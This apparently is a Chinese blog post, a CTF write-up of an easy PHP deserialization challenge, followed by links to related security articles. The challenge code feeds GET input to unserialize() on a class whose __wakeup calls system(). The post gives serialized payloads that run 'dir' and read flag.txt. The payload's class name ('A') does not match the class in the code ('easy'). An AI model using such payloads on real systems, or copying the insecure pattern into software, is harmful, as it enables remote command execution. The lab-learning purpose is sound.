[web]-反序列化漏洞-easy入门

最新推荐文章于 2025-05-06 19:00:01 发布

少多慢快

最新推荐文章于 2025-05-06 19:00:01 发布

阅读量328

点赞数 5

分类专栏： ctf 文章标签：反序列化 php

本文链接：https://blog.youkuaiyun.com/mails2008/article/details/140468457

版权

ctf 专栏收录该内容

42 篇文章

订阅专栏

打开网站看到代码：

<?php
highlight_file(__FILE__);
class easy{
public $cmd;
public function __wakeup(){
system($this->cmd);
}
}
unserialize($_GET['pop']);
?>

是一个简单的反序列化题目，在本地启动php_study,生成序列化字符串：

<?php
highlight_file(__FILE__);
class easy{
public $cmd;
public function __wakeup(){
system($this->cmd);
}
}
$a=new easy();
echo serialize($a);
unserialize($_GET['pop']);
?>


O:1:"A":1:{s:3:"cmd";N;}

魔术函数__wakeup()会在反序列化的时候自动执行, 看到里面有system函数，构造cmd参数，执行系统命令。

通过get参数传递包含构造cmd参数的字符串

O:1:"A":1:{s:3:"cmd";s:3:"dir";}

最终payload: O:1:"A":1:{s:3:"cmd";s:13:"type%20flag.txt";}

关注博主即可阅读全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

少多慢快

关注关注

5
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

[网络安全自学篇] 八十一.WHUCTF之WEB类解题思路WP（文件上传漏洞、冰蝎蚁剑、反序列化phar）

杨秀璋的专栏

05-30

1万+

这是作者网络安全自学教程系列，主要是关于安全工具和实践操作的在线笔记，特分享出来与博友们学习，希望您喜欢，一起进步。前文分享了WHUCTF部分题目，包括代码审计、文件包含、过滤绕过、SQL注入。这篇文章将讲解Easy_unserialize解题思路，详细分享文件上传漏洞、冰蝎蚁剑用法、反序列化phar等。第一次参加CTF，还是学到了很多东西，后面几天忙于其他事情，就没再参加。人生路上，要珍惜好每一天与家人陪伴的日子。感谢武汉大学，感谢网安学院，感谢这些大佬和师傅们（尤其出题和解题的老师们）~

Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等

weixin_46280935的博客

09-10

6018

Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享，作为笔记吧，欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合文章/书籍/教程相关说明请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏

参与评论您还未登录，请先登录后发表或查看评论

web:php反序列化漏洞利用入门手册

weixin_59166557的博客

10-05

1303

对象属性的序列化定义包含属性的可见性和属性名。公共属性 (public受保护属性 (protected私有属性 (private注意：私有属性的名称在序列化时会加上类名前缀，并用空字符分隔，以避免与其他类中同名属性冲突。?使用应用程序内部的现有代码制作有效载荷。# 基本序列化数据a:2:{i:0;s:4:"XVWA";i:1;# 命令执行}"引用赋值 (=&：多个变量指向同一个内存地址，改变一个变量会影响另一个变量。传引用（函数参数）

【网络安全零基础渗透测试入门必知必会】之php反序列化漏洞原理解析、如何防御此漏洞？如何利用此漏洞？2

Libra1313的博客

07-23

533

这是大白给粉丝盆友们整理的网络安全渗透测试入门阶段反序列化渗透与防御第2篇。本文主要讲解php反序列化漏洞原理解析、如何防御此漏洞？如何利用此漏洞？类是定义了一件事物的抽象特点，它将数据的形式以及这些数据上的操作封装在一起；对象是具有类类型的变量，是对类的实例；类的定义包括定义类名、定义成员属性、定义成员方法；内部构成：成员属性(变量)+成员方法(函数)序列化是将对象或数组转化为方便存储、传输的字符串，php使用serialize()函数将对象序列化；

网络安全web方向入门题合集

dra_p0p3n's blogs

08-15

5066

这是我大三在实习的时候做的一些题目，以后准备搞人工智能方向，应该也不会再接触网安了，就在这里汇总一下之前做的简单题吧，虽然简单但是也用了很多功夫去写这些，提高也很大，以此留作纪念吧。

面试总结-2023届安全面试题总汇

lza20001103的博客

09-16

7440

2023届安全面试题总汇文章目录2023届安全面试题总汇前言0x01 秋招目录（随时更新）0x02 各大安全厂商面试题资料链接一个2023届毕业生在毕业前持续更新、收集的安全岗面试题及面试经验分享前言最近发现一个宝贵的面试文章，写了各个以分安全为业务的公司汇总，也是面试官经常会问到的问题，以及CTF经历也是面试官所看好的，大家平时要多多打打CTF和靶机实战呀，这样我们的实战能力才会所有提高。 0x01 秋招目录（随时更新）有最新的公司校招信息可以随时发布，第一时间更新主要安全行业的公司，主要放不以安

CTF刷题-汇总

热门推荐

~airrudder~

04-09

1万+

BUUCTF平台的刷题之旅 Web

NewStarCTF 2022 web方向题解 wp

Jay17的博客

08-29

3075

NewStarCTF 2022 web方向题解 wp

2021暨南大学CTF新生杯（Web篇）

恒Keep毅

12-03

5734

目录【1星????】baby_sql【3星????】checkin相关链接弱语言判断科学技术法绕过字符串绕过【1星????】baby-upload【2星????】baby-unserialize绕过wake_up十六进制绕过【2星????】easy-sql构建tamper手动注入【2星????】easy_js处理十六进制的JS源码阅读JS源码控制台修改【2星????】easy-upload伪造后缀名字上传一句话以及菜刀拿到flag【4星????】easy-rce仅能函数执行？我该怎么绕过读取文件呢？【3星?

Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271

11-11

Java反序列化漏洞是软件安全领域的一个重要话题，特别是在企业级应用服务器如Weblogic中，这类漏洞可能导致远程代码执行、系统权限提升等严重后果。工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查...

weblogic--反序列化漏洞测试Test

10-19

3. **CVE漏洞编号**：WebLogic反序列化漏洞往往与特定的CVE（Common Vulnerabilities and Exposures）编号相关，比如CVE-2015-4852、CVE-2017-10271等。这些漏洞影响了WebLogic的不同版本，了解具体受影响的版本有助...

65-65.渗透测试-反序列化漏洞的出现.mp4

05-10

65-65.渗透测试-反序列化漏洞的出现.mp4

Web安全--反序列化漏洞（java篇）

bobo_milk的博客

11-29

3414

java反序列化参考

软考-软件设计师中级备考 11、计算机网络

开心程序员的博客

05-04

1253

IP 地址：是分配给网络设备的逻辑地址，用于在网络中标识设备的位置。目前常用的是 IPv4 地址，它由 32 位二进制数组成，通常用点分十进制表示，如 192.168.1.1。IPv4 地址空间有限，随着网络设备的大量增加，逐渐出现地址不足的问题。网络故障 1)ping 127.0.0.1 2)ping 本机局域网ip 3）ping 网关 4)ping 百度IPv6：是为了解决 IPv4 地址耗尽问题而提出的下一代 IP 协议。

Webug4.0靶场通关笔记17- 第21关文件上传(htaccess)

mooyuan的网络安全博客

05-06

546

本文通过《webug4.0靶场第21文件上传之htaccess》对客户端前端和服务端的代码进行审计，基于代码审计来分析渗透思路并进行渗透实战。

网络安全的原理和基本知识点

mrzyun0811的博客

05-05

290

Python在网络安全防护中具有广泛的应用，通过利用丰富的库和模块，可以实现网络扫描、漏洞检测、渗透测试、恶意软件分析、防火墙规则管理、Web安全防护、安全日志分析和加密通信等功能，帮助提升网络系统的安全性和抵御潜在威胁的能力。网络安全：保护网络系统和数据免受攻击、损坏或未经授权的访问，确保其机密性、完整性和可用性。使用Python解析和分析系统日志、网络流量日志，检测异常活动，及时发现潜在的安全威胁。使用nmap库进行端口扫描和主机发现，识别网络中的开放端口和服务，发现潜在漏洞。

【渗透测试】任意文件上传下载漏洞原理、复现方式、防范措施

weixin_45747158的博客

05-03

701

任意文件上传/下载漏洞的核心在于信任用户输入与缺乏纵深防御。通过白名单校验、内容检测、权限隔离等技术手段，结合持续的安全测试与团队培训，可有效降低风险。攻防对抗中需关注新兴绕过技术（如AI生成恶意文件），动态调整防御策略。

linux redis 设置密码以及redis拓展

最新发布

qq_24428851的博客

05-06

263

127.0.0.1:6379>auth 123456 //指定密码。在服务器上，这里以linux服务器为例，为redis配置密码。requirepass 123456 指定密码123456。最后编辑于：2025-04-21 11:08:01。著作权归作者所有,转载或内容合作请联系作者。1.redis-cli连接redis。修改redis.conf配置文件。保存后重启redis就可以了。

渗透测试中扫描成熟CMS目录的意义与技术实践

w2361734601的博客

05-04

981

即使CMS核心代码坚如磐石，人为疏忽、第三方依赖和服务器配置仍会形成“木桶效应”。目录扫描的价值不仅在于发现漏洞，更在于系统性解构安全边界。在攻防对抗中，细节决定成败，而扫描器正是打开细节盲区的钥匙。

apache shiro - 550反序列化漏洞

01-05

### 关于Apache Shiro 550反序列化漏洞详情对于Apache Shiro存在的反序列化漏洞，具体到CVE编号为CVE-2016-4437而非CVE-2022-42889。此漏洞存在于Apache Shiro<=1.2.4版本中，在返回包的Set-Cookie中存在`rememberMe=deleteMe`字段可以作为识别该漏洞的一个标志[^1]。当应用程序使用了不安全的方式处理rememberMe功能时，攻击者可以通过构造恶意输入来触发Java对象的反序列化过程，从而执行任意代码。这一特性使得攻击者能够在服务器端运行未经许可的操作，造成严重的安全隐患[^3]。为了检测是否存在上述提到的安全风险，可借助专门开发出来的工具如ShiroExploit来进行测试；这些工具能够帮助确认目标环境是否容易受到此类攻击的影响，并提供相应的证据支持[^4]。 ### 修复措施建议针对已知的Apache Shiro反序列化漏洞(CVE-2016-4437)，官方推荐升级至更高版本以获得最新的安全性改进和支持。除了及时更新软件外，还应采取其他预防性策略： - **禁用Remember Me功能**：如果业务逻辑允许的话，考虑完全关闭记住我的选项。 - **加强依赖库管理**：定期审查项目所使用的第三方组件及其版本号，确保它们都是最新且经过充分审计的状态。 - **实施严格的输入验证机制**：无论是来自客户端还是内部服务之间的通信数据都应该被仔细过滤和校验，防止潜在危险载荷进入系统核心区域。 ```bash # 更新Shiro到最新稳定版 mvn install:install-file -Dfile=/path/to/apache-shiro-core-latest.jar \ -DgroupId=org.apache.shiro \ -Dversion=<new_version> \ -Dpackaging=jar ```